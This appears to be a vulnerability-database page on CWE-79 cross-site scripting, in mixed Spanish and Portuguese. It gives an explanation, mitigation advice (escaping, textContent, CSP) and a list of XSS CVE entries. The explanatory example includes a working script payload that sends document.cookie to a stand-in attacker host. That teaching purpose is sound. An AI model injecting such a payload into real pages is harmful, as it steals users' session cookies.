Fallos del tipo CWE-79

29.081 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2026-88869CRITICALAVideo AD_Server Stored XSS via log.php label parameterEPSS 0.5%CVE-2022-40178—A vulnerability has been identified in Desigo PXM30-1 (All versions < V02.20.126.11-41), Desigo PXM30.E (All versions < V02.20.126.11-41), DEPSS 0.5%CVE-2023-25059MEDIUMWordPress avalex Plugin <= 3.0.3 is vulnerable to Cross Site Scripting (XSS)EPSS 0.5%CVE-2026-3368HIGHInjection Guard <= 1.2.9 - Unauthenticated Stored Cross-Site Scripting via Query Parameter NameEPSS 0.5%CVE-2023-4406MEDIUMXSS in KC Group's E-Commerce SoftwareEPSS 0.5%CVE-2026-13040HIGHNEX-Forms <= 9.2.2 - Unauthenticated Stored Cross-Site Scripting via 'real_val__' ParameterEPSS 0.5%CVE-2023-25172MEDIUMDiscourse vulnerable to Cross-site Scripting - user name displayed on postEPSS 0.5%CVE-2023-48300MEDIUMEmbed Privacy missing escaping for show_all attribute in opt-out shortcodeEPSS 0.5%CVE-2022-31468MEDIUMOX App Suite through 8.2 allows XSS via an attachment or OX Drive content when a client uses the len or off parameter.EPSS 0.5%CVE-2026-16655HIGHFluent Forms <= 6.2.7 - Unauthenticated Stored Cross-Site Scripting via Name Field Nested `password` MemberEPSS 0.5%CVE-2026-83593HIGHWPBot <= 8.7.3 - Unauthenticated Stored Cross-Site Scripting via 'conversation' ParameterEPSS 0.5%CVE-2023-5378HIGHStored XSS in SmodBIP and MegaBIPEPSS 0.5%CVE-2024-26542MEDIUMCross Site Scripting vulnerability in Bonitasoft, S.A v.7.14. and fixed in v.9.0.2, 8.0.3, 7.15.7, 7.14.8 allows attackers to execute arbitrEPSS 0.5%CVE-2025-52668HIGHImproper input neutralization in the stats-conversions.php script in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes potential iEPSS 0.5%CVE-2026-9292HIGHRockwell Automation FactoryTalk® DataMosaix™ Private Cloud - Stored Cross-Site ScriptingEPSS 0.5%CVE-2022-23707—An XSS vulnerability was found in Kibana index patterns. Using this vulnerability, an authenticated user with permissions to create index paEPSS 0.5%CVE-2024-47527HIGHLibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device-dependencies.inc.phpEPSS 0.5%CVE-2026-12142HIGHNEX-Forms <= 9.2.2 - Unauthenticated Stored Cross-Site Scripting via '_name[]' Array ParameterEPSS 0.5%CVE-2026-75528HIGHBroken Link Checker <= 2.4.13 - Unauthenticated Stored Cross-Site Scripting via Comment Author URL / Link LogEPSS 0.5%CVE-2026-89412HIGHTranslatePress <= 3.3.5 - Unauthenticated Stored Cross-Site Scripting via Translation Memory Suggestion PanelEPSS 0.5%